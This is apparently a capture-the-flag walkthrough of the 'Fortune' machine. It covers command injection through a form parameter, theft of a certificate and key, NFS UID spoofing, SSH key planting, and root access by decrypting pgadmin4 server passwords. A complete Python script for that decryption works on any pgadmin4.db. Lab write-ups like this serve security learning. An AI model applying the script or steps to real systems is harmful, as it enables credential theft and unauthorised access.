Today we are going to solve another CTF machine, "Fortune". It is now a retired box and is accessible to VIP members.

Specifications

  • Target OS: FreeBSD
  • IP Address: 10.10.10.127
  • Difficulty: Insane

Contents

  • Getting user
  • Getting root

Enumeration

As always, the first step is the reconnaissance phase, starting with a port scan.

Port Scanning

In this step we identify which services are listening behind the IP address.

Enumerating Port 80

The URL http://10.10.10.127 shows nothing but a form with radio buttons that is submitted with a POST request.

Exploitation

However, if you intercept the request, the db parameter turns out to be vulnerable to remote command execution (RCE). The injected command works the same whether the request is replayed from Burp Suite or sent with curl.

After some enumeration through the RCE we were able to retrieve the SSL certificate and its private key.

Convert the PEM certificate and key to PFX (PKCS#12) format (read more here). This creates a cert.p12 file, which we can import into Firefox as a client certificate and then load https://fortune.htb.

After that, click on Generate. The page creates an SSH public/private key pair for you.

However, if you try to SSH in as bob, it does not work.

The nfsuser account hints at NFS shares, so let's check whether any other ports are open.

After mounting the share, to access the charlie directory you have to add another local user, since NFS grants access by numeric UID rather than by user name.

Moving on, taking a look at charlie's mbox shows the following mail.

The .ssh directory is writable for us, so we copy in the public key the website generated for us: echo "key" > auth…_key

Now we can SSH in as charlie with the generated private key.

Privilege Escalation

Searching the filesystem for pgadmin4 turns up the following directories and files.

Inside /usr/local/pgadmin4/pgadmin4-3.4/web/config_local.py there is the path of the SQLite database:

/var/appsrv/pgadmin4/pgadmin4.db

Let's download it to our machine.

Kali ships with DB Browser for SQLite, which we can use to open it.

If we take a look at the server table, its password column contains values that look like salted hashes.

We need to recover the password, so first let's find out what format this actually is.

pgadmin4 is open source, so looking at the cryptography code in its GitHub repository we find crypto.py.

It contains the functions we need to look at: the server password is not hashed but encrypted, and crypto.py shows exactly how to decrypt it.

One more thing is needed: the key, which is bob's password hash from the user table. Running the decryption gives the following output.
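The decryption described above, as an added example that is not code from the original post or pgadmin4's own crypto.py. It reimplements the scheme crypto.py uses (the server password is AES-CFB8-encrypted under the owning user's stored password hash, truncated to 32 characters and right-padded with '}', with the 16-byte IV prepended and the whole thing base64-encoded) and runs it over the server and user tables of a pgadmin4.db. The database contents, table columns and hash values below are constructed for the example, the AES backend (the `cryptography` package, or pycryptodome as fallback) is an assumption, and the script name is hypothetical; pointing it at a real pgadmin4.db decrypts every stored server password with nothing but the hash that sits in the same file.

```python
"""
Added example (not from the original post, nor pgadmin4's own crypto.py):
recover pgadmin4 server passwords from pgadmin4.db.

pgadmin4 3.x (web/pgadmin/utils/crypto.py) does not hash server.password;
it encrypts it:
    key        = user.password (the stored hash string), cut to 32 characters
                 and right-padded with '}' to 32 bytes (AES-256)
    ciphertext = base64( iv[16] || AES-CFB8(key, iv).encrypt(plaintext) )
"""
import base64
import os
import sqlite3
import sys

PADDING_CHARACTER = "}"
BLOCK_SIZE = 16

# AES backend. Assumption: `cryptography` or pycryptodome is installed.
# pgadmin4 used PyCrypto, whose CFB mode defaults to 8-bit segments (CFB8).
try:
    from cryptography.hazmat.backends import default_backend
    from cryptography.hazmat.primitives.ciphers import Cipher, algorithms, modes

    def _aes_cfb8(key, iv, data, decrypt):
        cipher = Cipher(algorithms.AES(key), modes.CFB8(iv), backend=default_backend())
        op = cipher.decryptor() if decrypt else cipher.encryptor()
        return op.update(data) + op.finalize()
except ImportError:
    from Crypto.Cipher import AES  # pycryptodome

    def _aes_cfb8(key, iv, data, decrypt):
        c = AES.new(key, AES.MODE_CFB, iv, segment_size=8)
        return c.decrypt(data) if decrypt else c.encrypt(data)


def pad(key):
    """pgadmin4's pad(): first 32 chars of the key, right-padded with '}'."""
    str_key = key[:32]
    return (str_key + (32 - len(str_key)) * PADDING_CHARACTER).encode()


def encrypt(plaintext, key, iv=None):
    """Mirror of crypto.encrypt(); a fixed iv may be passed for reproducibility."""
    iv = os.urandom(BLOCK_SIZE) if iv is None else iv
    return base64.b64encode(iv + _aes_cfb8(pad(key), iv, plaintext, False))


def decrypt(ciphertext, key):
    """Mirror of crypto.decrypt(): base64-decode, split off the 16-byte iv, AES-CFB8."""
    raw = base64.b64decode(ciphertext)
    return _aes_cfb8(pad(key), raw[:BLOCK_SIZE], raw[BLOCK_SIZE:], True)


def recover_server_passwords(con):
    """Join server -> user and decrypt each server.password with the owner's hash.
    Only the columns used here are assumed to exist; a real pgadmin4.db has more."""
    rows = con.execute(
        "SELECT s.name, s.username, s.password, u.password "
        "FROM server s JOIN user u ON u.id = s.user_id"
    ).fetchall()
    return [(name, user, decrypt(enc, key).decode()) for name, user, enc, key in rows]


def build_sample_db():
    """Constructed, reduced stand-in for pgadmin4.db (schema trimmed, values made up)."""
    con = sqlite3.connect(":memory:")
    con.executescript(
        "CREATE TABLE user (id INTEGER PRIMARY KEY, email TEXT, password TEXT);"
        "CREATE TABLE server (id INTEGER PRIMARY KEY, user_id INTEGER, name TEXT,"
        " host TEXT, username TEXT, password TEXT);"
    )
    # A passlib-style hash string as pgadmin4 stores it; this one is fake.
    bob_hash = "$pbkdf2-sha512$25000$FAKEsaltFAKEsalt$FAKEhashFAKEhashFAKEhash"
    con.execute("INSERT INTO user VALUES (1, 'bob@example.invalid', ?)", (bob_hash,))
    enc = encrypt(b"dba-password-placeholder", bob_hash).decode()
    con.execute(
        "INSERT INTO server VALUES (1, 1, 'fortune', 'localhost', 'dba', ?)", (enc,)
    )
    return con


if __name__ == "__main__":
    # Usage: python pgadmin_decrypt.py /path/to/pgadmin4.db  (no path: the sample DB)
    con = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db()
    for name, user, password in recover_server_passwords(con):
        print(f"{name}: {user} / {password}")
```

The key point is that the "hash" in the user table is the decryption key, not something to crack: pad() truncates it to 32 characters, so only the prefix of the hash string matters, and any other hash with the same first 32 characters would decrypt the same ciphertext.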

Now that we have the password we can su to root, since the mail we found suggested that the same password is used for the dba database account.